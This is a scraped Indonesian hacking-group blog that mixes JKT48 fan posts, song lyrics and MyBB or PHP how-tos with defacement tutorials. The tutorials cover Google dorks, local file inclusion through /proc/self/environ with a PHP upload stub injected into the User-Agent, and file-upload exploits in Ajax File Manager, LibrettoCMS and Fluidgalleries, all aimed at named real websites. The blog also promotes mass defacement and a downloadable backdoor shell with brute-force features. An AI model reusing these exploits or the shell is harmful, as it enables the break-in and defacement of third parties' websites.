Tanya Jawab Tentang JKT48 Plagiat AKB48

JKT48 itu plagiat dari AKB48
Bukan, karena jika plagiat maka JKT48 pasti sudah dituntut oleh AKB48 di pengadilan internasional tentang hak cipta. Justru JKT48 tercantum di website dari AKB48 dan di memang sister group dari AKB48. Mungkin yang lebih nyata yaitu AKB48 satu panggung dengan JKT48, sudikah sang artis berada satu panggung dengan sang plagiat?dan juga JKT48 sering diundang ke konser AKB48, jika memang dianggap plagiat sudah pasti di banned oleh AKB48 bukan?sederhana bukan?


Lagunya sama, tetap plagiat bukan?Cuma diproduser orang yang sama.
Dalam hal umum, plagiat itu seseorang B mengambil/mencuri/meniru/me-copy sesuatu ide dari seseorang A tanpa meminta izin dan kemudian si B mengumumkan bahwa ide tersebut miliknya. Didalam hal bermusik, jika A mempunyai sebuah lagu atau konsep atau ide, lalu tanpa sepengetahuan A si B mengambil dan mengaku sebagai pemilik lagu atau konsep atau ide tersebut di depan publik. Yang paling banyak terjadi plagiarisme di dunia musik yaitu permasalahan lagu. Secara umum sebuah lagu dikatakan plagiat jika notasi atau irama lagu A mirip identik dengan lagu B sebanyak 8 BAR atau lebih dan salah satu dari pencipta lagu tersebut melakukan tindakan plagiat, padahal pencipta dan pemilik lagu tersebut TIDAK SALING TERKAIT ATAU BERHUBUNGAN.

Berarti JKT48 plagiat dengan AKB48 bukan?
Disini ada yang berbeda dengan hal yang terjadi pada JKT48 dengan plagiarisme. Contoh kasus : Pemilik lagu heavy rotation adalah Akimoto Yasushi. Lagu itu awalnya dibuat untuk AKB48. Seiring makin berkembangnya AKB48 maka lahirlah sister group NMB48, SKE48, HKT48, JKT48 maka lagu heavy rotation diperbolehkan untuk dinyanyikan dan sengaja diberikan kepada ke 4 sister group tersebut. Jika jeli dengan lagu heavy rotation, di lagu tersebut selalu ditulis CIPTAAN : Akimoto Yasushi, bukan CIPTAAN AKB48 atau SKE48 atau NMB48 atau HKT48 atau JKT48. Sedikit mirip dengan kasus seorang pencipta lagu A memiliki lagu �a�, lalu datanglah artis B menginginkan membawakan lagu �a� tersebut. Atas seijin A maka B pun bisa membawakan lagu �a� tersebut dimana pun. Istilah sekarang, yang dilakukan oleh B adalah cover song. Bisa dilihat di situs youtube, disana banyak sekali yang melakukan cover song bukan?plagiat?tidak!sejauh mereka tidak mengakui lagu yang dibawakan itu lagu mereka dan tidak dikomersialisasikan.

Berarti JKT48 cuma cover lagu AKB48?
Bukan, :) JKT48 tetap membawakan lagu tersebut secara resmi bukan dianggap sebagai cover. Cover lagu dilakukan oleh artis A yang membawakan lagu dari pihak lain B. Disini berarti sang artis si A mendatangi, meminta izin, dan mendapatkan jalan untuk menyanyikan lagu tersebut. Berbeda hal nya dengan JKT48, disini mereka memang diberikan secara langsung oleh sang pencipta, bisa dikatakan �SUATU KEHARUSAN� untuk dibawakan/dinyanyikan karena sang pencipta lagu tersebut tidak lain tidak bukan adalah sang total produser dari AKB48, SKE48, NMB48, HKT48 dan JKT48 yaitu Akimoto Yasushi.
Dan pasti untuk kedepan JKT48 membawakan lagu ciptaan mereka sendiri.

Masa bodoh ah, tetap aja JKT48 itu plagiat! buktinya tidak punya lagu sendiri
Kenapa tidak punya lagu sendiri untuk saat ini?Akimoto Yasushi pasti mempunyai rencana dan sistem yang tidak mungkin untuk dipublikasi-kan secara umum. Tapi sejauh ini saya melihat dan mempunyai pemikiran (ingat!ini hanya penilaian saya, jika tidak setuju saya tetap memaklumi) bahwa, Akimoto Yasushi sementara ini memberi JKT48 lagu-lagu dari AKB48 karena masyarakat Indonesia masih awam dengan dunia 48. Coba, sebelum anda mengenal JKT48 apakah sudah mengenal AKB48?Akimoto Yasushi?Umumnya mereka yang mengenal dunia 48 hanya mereka yang suka hal berbau Jepang dan secara intens mengikuti perkembangan dunia musik di Jepang lewat internet. Nah, konsep dunia 48 itu sangat luas dan kompleks (tetapi sebenarnya sangat menarik untuk di tela�ah). Jika saja JKT48 diperkenalkan dengan tidak membawakan lagu Heavy Rotation, Aitakatta, Kimi no kotoga suki dakara maka masyarakat umum pasti akan secara lebih aktif dan represif untuk mengatakan JKT48 plagiat AKB48 karena konsep member yang sama banyak, seifuku/seragam yang hampir sama dan sama-sama ada angka 48! Bayangkan juga jika JKT48 dipaksakan untuk membawakan lagu sendiri disaat awal-awal, maka bisa dimungkinkan rencana Akimoto Yasushi dengan JKT48 nya untuk menguasai industri musik Indonesia akan berjalan gagal. Akimoto Yasushi pasti juga sedang melihat melodi/nada lagu atau lagu seperti apa saja yang sedang digandrungi masyarakat Indonesia, dan dimungkinkan beliau saat ini juga sedang menciptakaan lagu untuk JKT48.

Apapun rencana Akimoto Yasushi, beliau selalu mengagetkan dan sedikit diluar nalar bagi fans 48, tapi dengan suksesnya dunia 48 yang beliau kendalikan tak heran jika Akimoto Yasushi di sebut orang yang cerdas.

Sekali plagiat tetap plagiat!
Belajar jadi orang dewasa ya, :) jika tidak suka dengan JKT48 saya tidak mempermasalahkan, tetapi apasalahnya untuk memperluas pengetahuan dalam hal musik :)

Jika mengatakan hal plagiat pastikan bahwa memiliki pengetahuan yang kuat dalam hal bermusik berserta plagiarisme, jangan sekedar berbicara :)

BUDAYAKAN GEMAR MEMBACA! :D


Source

JKT48 Official Website Hacked by Katonz

Lagi asik-asik fb an, eh ada post di grup SBH, Wo Love JKT48.

Ya, bug di web JKT48 ditemukan, dan tampilan depan webnya diganti dengan title Katonz | We Love JKT48 . Dengan background warna hitam, dan foto salah satu member JKT48, Sonya. :) . Beberapa nama melintas, seperti Kiraa, Meninbox, Bluefrozen, Bagsfreakz, Xcrusher, Briankamikuzik, DenyFebriant, panda, jati, Bram wiratma, Ch0c0, Hilmi, Black-ID, Kang Awan, Zeattacker, Lowo ireng

Dibawah tidak lupa tertulis, www.surabayablackhat.org | katonz@ymail.com

Ini tampilannya

Mirrornya :

http://zone-h.org/mirror/id/20137834



Saya tegaskan, tidak ada unsur penyerangan atau dendam dari aksi deface ini. Semua murni karena niat baik untuk memberi warning bahwa ada bug di website JKT48.

Metodenya kemungkinan DNS Spoofing.

Web JKT48 masih bisa diakses dari

http://118.151.146.243/



Thanks to Katonz - SurabayaBlackhat

Baru Datang, Pergi Lagi

Mungkin sobat bertanya-tanya, hampir semingguini saya jarang blogwalking. padahal posting masih jalan terus. Ya, seminggu ini saya disibukkan oleh kegiatan di dunia nyata. Maklum, anak sekolah. :) .

Nah, kemarin penerimaan raport Semester genap di SMAN 2 BANGKALAN.

Alhamdulillah naik kelas. Ya meskipun saya anak yang bodoh dan tidak bisa menyebutkan icon-icon pada excel.

Dan mulai hari ini liburan sekolahnya. Dan post ini hanya sebagai pemberitahuan kalau saya jarang blogwalking bukan berarti sombong atau tidak mau membalas kunjungan dari sobat-sobat semuanya. Tapi saya benar-benar sibuk. Dan sepertinya liburan kali ini pun akan sibuk mengingat ini adalah kesempatan saya untuk pulang bertemu orang tua. :)



Sekian dan semoga bisa memaklumi.

See you next time . :)

Cara Terbaru Download Video Youtube tanpa Software

Beberapa waktu yang lalu, tepatnya saat keyboard laptop saya rusak saya terpaksa ke warnet untuk mendownload video. Nah, apsnya kok sampai warnet di client tidak terinstall IDM. Dan saat saya mencoba menginstallnya, malah error. Mungkin sudah disetting oleh Op Warnetnya supaya tidak bisa menginstall software.

Nah, karena yang mau didownload adalah video youtube, ya agak susah juga. Untung ada yang ngasih tau trik download video youtube tanpa software. Dan ini work . :v

Oke, pertama, buka link berikut :


http://en.savefrom.net/
Jika sudah, masukkan link video yang akan didownload. Contoh : http://www.youtube.com/watch?v=q73nNSOQ83A

Lalu klik download. Nah,setelah proses selesai, akan muncul link download. Ex : FLV, MP4, 3GP, dll

Lihat SS :

Ya tinggal download.

Sekian dan semoga bermanfaat. :)

Forum Indonesian Cyber Army !!!

IDCA ~ Selamat datang di blog kami.

Assalamualaikum sobat IDCA , sudah sekian lama kami membicarakan akan membuat sebuah forum sendiri dan akhirnya sekarang sudah terwujud. Forum resmi kami yang beralamatkan http://www.indocyberarmy.org sudah dirilis mulai tadi pagi.

Dengan terbentuknya forum ini, kami berharap kalian yang punya unek unek untuk share sebuah artikel akan bisa terwujud disini =))

Forum ini sejatinya dapat terlaksana karena bantuan lagi lagi dari teman kami, siapa lagi kalo bukan "Ade Hendra" hihi . Dia memberikan kami sebua Hosting dan Domain secara geratis, Alhamdullilah :sujudsukur: hahaha :D


Special Thanks to : Ade Hendra Surya Nugraha yang telah memberikan donasi kepada kami
Terimakasih juga terhadap semua keluarga IDCA Official or Unofficial atas support dan dukungannya hingga IDCA bisa sampai saat ini dan tidak lupa keluarga besar JKT48 Cyber Team atas bantuannya membuat tampilan forum menjadi lebih bagus ^_^

JOIN WITH US

Oiya mungkin nanti kalian akan heran kenapa forum underground ada subforum tentang JKT48 Cyber Team ? yaa terbentuknya forum ini tidak terlepas dari anak anak JCT yang sudah memberikan banyak pencerahan dan bantuan hingga forum bisa lebih mudah di akses.

Sekian berita yang bisa saya sampaikan ^_^

Regards

./Admin Indonesian Cyber Army

Web Hacking ( Local File Inclusion )

Assalamualaikum ^_^

Selamat datang di blog official Indonesian Cyber Army ~ Pada kesempatan kali ini saya akan membagikan tutorial yang dikirim oleh teman saya ke kantor IDCA *cie elaah, bersyukur deh ane yang ngak bisa apa apa, punya banyak temen yang mau berbagi ke IDCA :D oke langsung aja ye :D


Sebelum Bahas Tutorial LFI saya akan Jelasin Singkat Apa Itu LFI ? :)

LFI (Local File Inclusion) adalah sebuah lubang pada site di mana attacker bisa mengakses semua file di dalam server dengan hanya melalui URL. << udah cuma gitu xixixixiixixi .. Singkat kan ?? ^_^

Bahan yang Dibutuhkan :
1.rokok + Kopi Kapal Api
2.Camilan
3.Tamper Data (https://addons.mozilla.org/en-US/firefox/addon/tamper-data/)
4.shell / script file upload ..
5.Dork + Kesabaran Dalam Mencari Site Bug LFI , :D

Dork list :
inurl:.php?(*)=(*)php , inurl:.php?(*)=mapa.php , inurl:.php?caminho=(*)php , inurl:.php?(*)=Sitemap.php
ingat !! Harus Ada .php dibelakang = !!
Misal : inurl:.php?pg=mapa.php << harus ada .php  !!

Trick Search Dork LFI , by ./me !!
1. buka translate.google.com , xixiixixxiixixi
2.tulis text ente ke google translate yang berkaitan dengan file file di website !! Seperti = Sitemap , contact , daftar , dll ..
3.translate text yang kamu tulis ke berbagai bahasa .. misal sitemap , translate ke portugal jadi , mapa
4.masu''kan dork km ke google : inurl:.php?(*)=mapa.php << ingat Harus ada .php
5.Success !! ^_^


Oke Bahan Udah Lengkap + Trick Dork Jadul by ./me , tinggal Tutorialnya aja ya !! Ok Lest Go !!
1. kita nemuin website yang vuln LFI.
contoh : http://site.com/main.php?file=news.php

2.list target : http://www.ibriec.org/menara_perkebunan/index.php?open=../../../../../../../../../../proc/self/environ

3.coba kita ganti page_05.php pada list target diatas :
  ../../../../../../../../../proc/self/environ

4. Jika anda mendapatkan yang seperti ini :

 SERVER_SIGNATURE=
Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_jk/1.2.35 Server at baleman.co.id Port 80
UNIQUE_ID=Ua6ugso68-wAAF8wsfgAAAAKHTTP_USER_AGENT=Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0SERVER_PORT=80HTTP_HOST=baleman.co.idREDIRECT_HANDLER=application/x-httpd-php5DOCUMENT_ROOT=/home/s2400x14/public_htmlSCRIPT_FILENAME=/usr/local/cpanel/cgi-sys/php5REQUEST_URI=/index_1.php?hal=../../../../../../../../../../../proc/self/environSCRIPT_NAME=/cgi-sys/php5HTTP_CONNECTION=keep-alivePATH_INFO=/index_1.phpREMOTE_PORT=18429PATH=/usr/local/bin:/usr/bin:/binPWD=/usr/local/cpanel/cgi-sysSERVER_ADMIN=webmaster@baleman.co.idREDIRECT_STATUS=200REDIRECT_QUERY_STRING=hal=../../../../../../../../../../../proc/self/environHTTP_ACCEPT_LANGUAGE=en-US,en;q=0.5PATH_TRANSLATED=/home/s2400x14/public_html/index_1.phpHTTP_ACCEPT=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8REMOTE_ADDR=180.253.80.169SHLVL=0SERVER_NAME=baleman.co.idSERVER_SOFTWARE=Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_jk/1.2.35QUERY_STRING=hal=../../../../../../../../../../../proc/self/environSERVER_ADDR=202.58.243.17GATEWAY_INTERFACE=CGI/1.1SERVER_PROTOCOL=HTTP/1.1HTTP_ACCEPT_ENCODING=gzip, deflateREDIRECT_URL=/index_1.phpREQUEST_METHOD=GETHTTP_COOKIE=__utma=247167511.668754680.1370401967.1370401967.1370401967.1; __utmb=247167511.1.10.1370401967; __utmc=247167511; __utmz=247167511.1370401967.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Home | Jad

atau keluar : Document ROOT dan ada User Agent Itu Web rentan LFI ,, OK Ternyata proc/self/environ dapat kita akses ! ^_^ Lest Go !

5.Sekarang mari kita injeksi dengan kode dengan meracuni http-headernya/User Agent , Tools yang Tadi (Tamper Data Udah Didownload kan ?? ^_^) Ok Kalau Sudah , Lanjut !!

6.buka tamper data di firefox lalu Buka URL Tadi Yang Rentan LFI , Klik Start Tamper lalu Reload Halaman Site !!

7.Muncul Kotak Box , jangan dicentang continue tampering .. , klik TAMPER

8.Pada Kolom/Kotak User agent , Hapus Text Tersebut ganti dengan code berikut :

  <?php @copy($_FILES['file']['tmp_name'],$_FILES['file']['name']); ?><p>Mr.Mx4rz Was Here !!</p><br> <form action="" method="post" enctype="multipart/form-data">Filename: <input type="file" name="file" /><input type="submit" value="Submit" />

*shell akan keluar di : localhost/[path]/namashell.php
9. Klik Oke .. , Stop Tamper !! Tamper data jangan di close ^_^

10.Muncul Sebuah File Upload Di Halaman Site Yang Rentan LFI tersebut ^_^
   Nih ScreenShotnya : https://fbcdn-sphotos-e-a.akamaihd.net/hphotos-ak-ash4/424631_391238194318689_1778808128_n.jpg

11.Selanjutnya Upload Shell / Script Deface kamu ^_^

12.Success , Tinggal Diacak acak dalemnya :D


^_^ Just Hacking And Have Fun ^_^

Greetz : UMCA Offical Member , Indonesian Cyber Army , Jember hacker Team , 3xp1r3 Cyber Army , and www.google.com !!

NB : Copy Paste Sertakan Sumber Ya ^_^ !! Hargai Seorang Penulis , ^_^

Special Thanks to : Mr.Mx4rz atas kirimannya ^_^

Content Created By Bimo Septiawan

Cara Menghapus Fungsi Attachment di Forum MyBB

Secara default, fungsi attachment ada di footer saat anda menntall forum MyBB. Kadang ada menganggap ini penting. Namun bagi saya lebih baik member ingin membuat thread mengupload sendiri filenya di 4shared atau layanan upload file yang lain.

Sebenarnya ada banyak cara untuk menonaktifkan fungsi upload attachment di MyBB. Namun saya arsa ini adalah cara yang paling mudah.

Oke, langsung saja.

Login ke Panel Admin MyBB.

Masuk ke Templates & Style

Klik menu templates -> pilih template yang sedang aktif / sedang digunakan.

Klik New Thread Templates --> newthread . Cari dan hapus kode {$attachbox}

Klik New Reply Templates --> newreply . Cari dan hapus kode {$attachbox}

Klik Edit Post Templates --> editpost . Cari dan hapus kode {$attachbox}



Done. Sekarang coba buat thread di forum. pasti fungsi upload di footer tidak ada. :)



created by nabilaholic - www.madura-cyber.org

Download Lagu JKT48 Futari Nori no Jitensha

Kali ini saya akan share lagu JKT48 yaitu Futari Nori no Jitensha.

Oke langung saja. Ini Liriknya :

Futari Nori no Jitensha



Don�t Stop jangan hentikan,

My Love slama-lamanya

Tolong biarkan ku lewat seperti ini

Go To kemana mana,

Heaven bila denganmu

Kuingin terus berlari

Cause I�m Loving You





Ku selalu tertawa,

Di bagian belakang sepeda

Yang kita naiki berdua,

Aku diam-diam berbisik





Reff 1:

Ah� mungkin bagi diriku hanya teman sekelas saja

Yang jalan pulangnya searah

Keberadaan yang seperti angin





Ah� yang selalu bercanda padahal kita s�lalu saling bicara

Mengapa hari ini

Cinta tak abadi yang berputar jauh

Don�t Say jangan katakan,

My Love jawaban itu





Indah suatu hari nanti jadi kenangan

Be Loved sampai kapanpun,

One Way dalam dadaku

Bersama dirimu saja I�m So Satisfied





Dengan pikiran seenaknya,

Tidaklah perlu dibalas

Kukayuh sepeda dan melaju,

Karena di situ ada jalan





Reff 2:

Ah� mungkin bagi diriku dirimu yang terakhir

Tidak menyadari apapun

Cinta tak berbalas dari belakang





Ah� langit di kala senja seperti mewarnai kota-kota

Terlalu sedih

Bayangan kita berdua menjadi satu





Back to Reff 1 & Reff 2

Nih Link Downloadnya :

Download Lagu JKT48 Futari Nori no Jitensha

Sekian dan semoga bermanfaat.

Ajax File Manager | File Upload Vulnerability

Kali ini saya akan share cara deface dengan exploit Ajax File Manager | File Upload Vulnerability. Exploitnya sangat mudah dipraktekkan. Cocok bagi newbie yang baru belajar deface. :) .

Oke, langsung saja kita mulai. Hehehehehe.

. Dork :

inurl:"ajaxfilemanager.php?page=" intitle:"ajax file manager" (kembangkan sendiri)

. File berekstensi .txt



Langkah Langkah :

1. Mulai cari target di google dengan dork diatas. :)

Sebagai contoh, saya pilih http://www.szfo-redcross.ru/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php?page=22



2. Lalu klik tombol upload di pojok kanan atas.

3. Kemudian upload file sobat. File harus berekstensi .txt . Sebaagi contoh, saya menguplaod filedengan nama jeje.txt

5. Jika sudah, klik file yang tadi sobat upload.

4. Akan terbuka link dimana file sobat berada. :)

http://www.szfo-redcross.ru/tiny_mce/plugins/uploaded/jeje.txt

Sekian tutorial kali ini. Semoga bermanfaat. :)

Personil Coboy Junior Tidak Punya Sopan Santun

Kemarin pas JKT48 menang di IKCA anak-anak pada share foto-foto di facebook. Eh, kok nyangkut di beranda foto salah satu personil CJR atau lebih tepatnya Bastian memeprlihatkan tingkah tingkah yang tidak pantas dilakukan oleh anak kecil.

Nih fotonya :

Bocah Maho

Lihat apa yang dia lakukan. Seakan akan tidak ada member JKT48 didepannya. Saya sendiri tidak tau maksud dari salah satu personil CJR ini. Mungkin mereka merasa sudah tenar sehingga tidak perlu memikirkan sopan santun. Padahal seharusnya mereka juga dididik sopan santun. Hadeuhhh, mau jadi apa bangsa ini.

Anak kecil kok gak ada respek ke yang lebih dewasa. -_-

Mass Deface Website

Assaamualaikum sobat IDCA, mumpung ane udah selesai UKK neh mau share trik jadul sih hahaha, tapi daripada ngak share :D

Oke langsung aja, ini bukan mass deface server loh :P tapi cuma mass deface website yang ada di direktori aja :D

Oke langsung aja ikutin langkah berikut ini :

Bahan :

• Mass Deface ( udah ada di shell X Inject / IDCA / etc )
• Website yang direktorinya ada domain/web lain.

1. Perhatikan gambar dibawah ini, jika terdapat alamat website lain di dalam gambar yang saya lingkarin itu tandanya bisa di mass deface ^0^

2. Setelah itu pergi ke direktori dimana terdapat website didalamnya 

• contoh :  / home / awbtrad / public_html / www.maho.com , jadi /home/awbtrad/public_html

3. Tuh banyak kan websitenya ? sekarang kita klik " Mass Deface "

4. Keterangan :

Folder : udah biarin aja (kan kita udah di direktorinya)

File Name : nama file yang mau dibikin

Kolom Index Code : Isi dengan script deface kalian ^_^

Setelah itu klik HAJAR !!! 

Dah cuma gitu aja om ^_^ tinggal submit atau show offin deh :P

Selamat mencoba :D

Content Created By : Bimo Septiawan

Exploit LibrettoCMS 2.2.2 Malicious File Upload

Kali ini saya akan share teknik deface dengan exploit  LibrettoCMS 2.2.2 Malicious File Upload. Exploitnya sangat mudah dipraktekkan terutama bagi para newbie seperti saya.

Oke langsung saja :



Bahan :

Shell php yang telah direname menjadi shell.doc

Dork :

inurl:adm/ui/js/ckeditor/plugins/pgrfilemanager

Exploit : 

http://target/librettoCMS/adm/ui/js/ckeditor/plugins/pgrfilemanager/PGRFileManager.php



Step by Step :
Mulai berselancar di google. Cari target yang sabar.
Misalnya saya pilih http://www.bluespacethinking.com/assets/js/plugins/ckeditor/plugins/pgrfilemanager/css/le-frog/

Ubah menjadi

http://www.bluespacethinking.com/assets/js/plugins/ckeditor/plugins/pgrfilemanager/PGRFileManager.php



Upload shell yang telah direname menjadi shell.doc.

Lihat gambar :

Setelah upload berhasil, rename shellnya menjadi shell.php

Akses shellnya di site/assets/user/shell.php

Hajar index. :)

http://www.bluespacethinking.com

http://www.hack-db.com/518922.html



Sekian dari  saya, semoga bermanfaat. :)

Created by nabilaholic - www.madura-cyber.org

Cara Mudah Pasang/Install Emoticon di MyBB

Oke, kali ini saya akan share cara memasang emoticon di forum MyBB. beberapa hari yang lalu saya mencoba memasang emoticon di forum. Namun saya kesulitan karena tidak menemukan tutorial ataupun langkah-langkah menginstall emoticon di forum MyBB. Saat saya bertanya di grup MyBB Indonesia tentang cara menginstall Emoticon di MyBB, eh saya malah deketawain. Hadeuhhh, paling muak yang namanya gak tau, bertanya malah diketawain.

Saya pun memutuskan untuk tidak bertanya lagi dan melakukan eksperimen di localhost. TANPA TUTORIAL !!! . Hanya dengan coba-coba kurang lebih satu jam, akhirnya sya berhasil. :) . Amkanya saya mencoba share kembali disini.

Oke langsung saja .

Sobat harus punya emoticon yang ingin diinstall. Jika belum, anda bisa download emoticon monyet untuk percobaan.

Download moticon Monyet untuk Forum MyBB . Password RAR : yuyud-jeje



Oke, langsung saja.

Setelah download, ekstrak file diatas. Di dalamnya ada file RAR lagi bernama monyet.zip . Yang itu jangan diekstrak ! Biarkan saja berbentuk zip.

Sekarang, masuk ke Cpanel sobat lalu masuk ke file manager.

Masuk ke direktori forum MyBB sobat.

Lalu masuk ke dorektori images - smiles . Lengkapnya sperti ini :

public_html/forum/images/smilies

Lalu, upload monyet.zip yang ada di dalam file RAR tadi di direktori /smilies

Tunggu sampai upload selesai lalu ekstrak. Jika kurang jelas silahkan lihat SS berikut :

Done. Urusan di Cpanel selesai. :)

Sekarang masuk ke panel admin Forum MyBB sobat.

Masuk ke menu configuration.

Lalu klik smilies -> add multiple smilies .

Karena tadi emoticon diekstrak di direktori /smilies/ , maka di Path to Images isi dengan images/smilies/ .

Lalu klik Show Smiles.

Jika kurang jelas silahkan lihat Screenshoot :

Maka akan ada banyak emoticon yang tadi diekstrak di cpanel. Tinggal centang mana yang mau diinstall, lalu klik Save Smilies.



Jika berhasil, maka ada notif seperti ini :

The selected smilies have been added successfully



Lihat SS :

Done. Sekarang emoticon siap digunakan. Cara ini berlaku juga untuk menginstall meoticon emoticon yang lain.

Sekian dari saya, semoga bermanfaat. :)

Created by Nabilaholic - www.madura-cyber.org

Exploit Fluidgalleries File Upload ( Tamper Data )

Assalamualaikum sobat IDCA :D

Udah lama neh ngak kasih tutorial baru, sebenernya sih sekarang amsih UKK ane maklum ane masih bocah ^_^ tapi boat sobat IDCA tak apalah ngak usah belajar mending bikin artikel kwkwkwkw

oke langsung aja yah ngak usah kelamaan basa basinya takutnya jadi basi XD

Kali ini saya akan memberikan tutorial " Deface dengan Exploit "Fluidgalleries" yang saya ketahui dari temen saya si The Jackerz & Cimy .

[+] LANGKAH LANGKAH [+]

• Dork : inurl:/fluidgalleries/photos/
• Bahan : Shell yang sudah direname menjadi shell.php.jpg

Dork kembangin sendiri OK ;)

1. Copas dork diatas ke mesin pencarian, lalu pilih salah satu target

2. Setelah memilih salah satu website gunakan exploit

• localhost/[path]/fluidgalleries/php/photo-upload.php

~> Target saya : http://www.antarhanif.com/Stills/fluidgalleries/php/photo-upload.php

Setelah itu buka tools " Tamper Data " kalian, lalu klik start tamper 

3. Setelah itu, pilih file yang akan kalian upload ( shell.php.jpg )

4. Lalu klik OK, saat keluar pop up tools tamper data kalian klik " tamper "

5.  Setelah itu akan keluar Pop Up lagi dan perhatikan di sebelah kanan ada kotak kecil, carilah kata  shell.php.jpg lalu ganti dengan shell.php 

6. Jika sudah di renam lalu klik OK, tunggu sampai proses upload selesai jika sudah klik stop tamper

7. Untuk melihat shell kalian terupload atau belum pergi ke :

• localhost/[path]fluidgalleries/photos/

inget nanti bakalan ada embel embel di nama shell kalian, jadi setelah akses localhost/[path]/fluidgalleries/photos/ kalian ketik CTRL + F lalu tulis nama shll kalian ;)

Upload sukses ^_^

8. Tinggal tebas deh websitenya :D

sekian tutorial yang dapat saya berikan, jika ada yang kurang jelas silahkan tanyakan di kolom komentar ^_^

NB : Jika tidak bisa upload Php upload aja html :D

Thanks to : The Jackerz & Cimy

Content Created By Bimo Septiawan

Membuat Kalkulator Sederhana dengan Script PHP

Membuat Kalkulator Sederhana dengan Script PHP - Kali ini saya akan share cara membuat kalkulator degan script PHP. Scriptnya cukup sederhana. Namun saya yakin akan sangat berguna bagi sobat semuanya. Oke langsung saja.

Ini scriptnya :

<?php

$hasil1= 0;

?>

<center>

<form name="form1" method="post" action="hitung.php" style="width: 250">

<div style="margin:5px">Operator matematika</div>

<div align="left" style="margin:5px">

<div style="width:70px; float:left">Angka Pertama</div>

<input name="angka1" type="text" id="angka1" maxlength="15">

</div>

<div align="left" style="margin:5px">

<div style="width:70px; float:left">Angka Kedua</div>

<input name="angka2" type="text" id="angka2" maxlength="15">

</div>

<div style="margin:5px">

<div style="width:70px; float:left">&nbsp;</div>

<div style="float:left">

<select name="operator2" id="operator2">

<option>+</option>

<option>-</option>

<option>*</option>

<option>/</option>

</select>

</div>

<input type="submit" name="Submit2" value="Hitung"/>

</div>

<div align="left" style="margin:5px">

<div style="width:70px; float:left">Hasil:</div><input name="hasil1" type="text" readonly="true" value="<?php if (isset($_GET['hasil1'])) echo $_GET['hasil1']?>"/>

</div>

</form></center>

</body>

Save script diatas dengan nama index.php

Lanjut ke script yang kedua.

Ini scriptnya :

<?php



$angka1 = $_POST['angka1'];

$angka2 = $_POST['angka2'];

$operator = $_POST['operator2'];



if ($operator == '+')

{

$hasil = $angka1+$angka2;

}

if ($operator == '-')

{

$hasil = $angka1-$angka2;

}

if ($operator == '*')

{

$hasil = $angka1*$angka2;

}

if ($operator == '/')

{

$hasil = $angka1/$angka2;

}



header ("location:index.php?hasil1=$hasil");

?>

Save dengan nama hitung.php

Jika sobat ingin mengganti nama "hitung.php" , misalnya akan diganti menjadi achan.php, maka di script yang pertama juga kode hitung.php juga harus diganti menjadi achan.php



Jika sudah, upload kedua script tersebut ke hostingan pribadi sobat atau bisa juga dijalankan lewat localhost. Namun kedua script tersebut harus dimasukkan dalam satu folder/direktori. Contoh : buat folder kalkulator dan simpan script index.php + hitung.php ke dalamnya.

Ini contoh buatan saya :

Kalkulator

Sekian dan semoga bermanfaat.

Cara Mudah Agar Link Selalu Terbuka di Tab Baru

Sebenarnya cara ini sudah lumayan lama. Namun karena saya sendiri baru praktek kemarin, jadi baru share sekarang. Sebenarnya cara agar link selalu terbuka di tab baru cukup mudah. Bahkan bisa dibilang super mudah. :v

Oke langsung saja ikuti langkah-langkahnya :



1. Login ke akun Blogger

2. Pilih menu Template

3. Pilih Edit HTML

4. Lalu cari kode </head> . Gunakan Ctrl + F agar lebih cepat.

5. Lalu masukkan kode berikut : <base target='_blank'/> sebelum kode </head>

6. Lalu klik Simpan Template



Done. Live Demo bisa dicek di setiap link blog ini. :p

Shell IDCA V2 Release !!

Selamat malam sobat IDCA ^_^

Pada kesempatan kali ini, saya akan membagikan Shell aka Backdoor aka Pintu Belakang IDCA Versi ke 2, shell ini masih recode dari bapaknya , yaitu B374K dan di coding oleh teman saya "Ade Hendra Surya Nugraha" emang paling top cer deh tuh orang :* ^_^

[+] PENAMPAKAN [+]

Home

Menu

*kalo gambar kegedean tekan CTRL + Scroll Mouse Ke Belakang 1x

[+] FITUR SHELL [+]

1. Fitur Bypass

• etc/passwd
• netstat
• /var/cpanel/accounting.log
• /etc/syslog.conf
• /etc/hosts
• /etc/named.conf
• /etc/httpd/conf/httpd.conf

     2. Config

     3. Jumping

     4. Cpanel Brute Force

     5. Joomla Brute Force

     6. WordPress Brute Force

     7. Script Encode

     8. Multiple Config

     9. Litespeed Config Fu*ker

     10. Hack-DB Submited

     11. Zone-H Submited

     12. Joomla Change Password

     13. Mass Deface

     14. SQL Scanner

     15. Auto disable function Apache & Litespeed

     16. Cek sendiri deeh apa aja fiturnya, capek ngetik semua wkwkwkw :D

Gimana ? kalo berminat make silahkan download

~ Login Password ~ 

DOWNLOAD

Password

• root | toor (kalo pas udah login malah eror klik enter di addresbarnya)

Special Thanks to : Ade Hendra Surya Nugraha

Content Creator : Bimo Septiawan

Cara Mudah Install Tema di MyBB

Oke, kali ini saya akan share cara mudah install tema di MyBB. Bagi sobat-sobat yang baru saja membuat forum mungkin tutorial ini sedikit berguna. :) . Sebenarnya cukup mudah.

Oke langsung saja saya mulai :

Saya asumsikan sobat sudah punya file .zip dari tema yang ingin sobat install.

Ekstrak file zip tersebut. Akan ada beberapa folder .

Cari folder images . Nah, di folder images tersebut biasanya terdapat folder lain yang berisi komponen dari tema yang ingin sobat install.

Contoh : Saya ingin menginstall tema MyRed. Maka setelah file zip diekstrak, akan ada folder yang jika dibuka berurutan adalah MyRed/images/red . Intinya, cari sampai folder terakhir setelah /images/ .

Lalu ubah lagi folder red menjadi .zip . [ red.zip ]

Nah, sekarang sobat masuk ke Cpanel - File Manager.

Masuk public_html/forum/images/ . Upload red.zip tadi di folder /images/ . Lalu ekstrak file zip tersebut.

Lihat SS :

Oke, proses di Cpanel selesai. Sekarang masuk ke Panel Admin MyBB sobat . [localhost]/forum/admin/index.php

Lalu masuk ke Menu Templates and Style - Import a Theme .

Lihat SS :

Pilih Local File. Klik Pilih Berkas, lalu upload file theme berformat .xml yang tadi terletak bersama file zip yang sobat ekstrak di step pertama. Ex : MyRed.xml

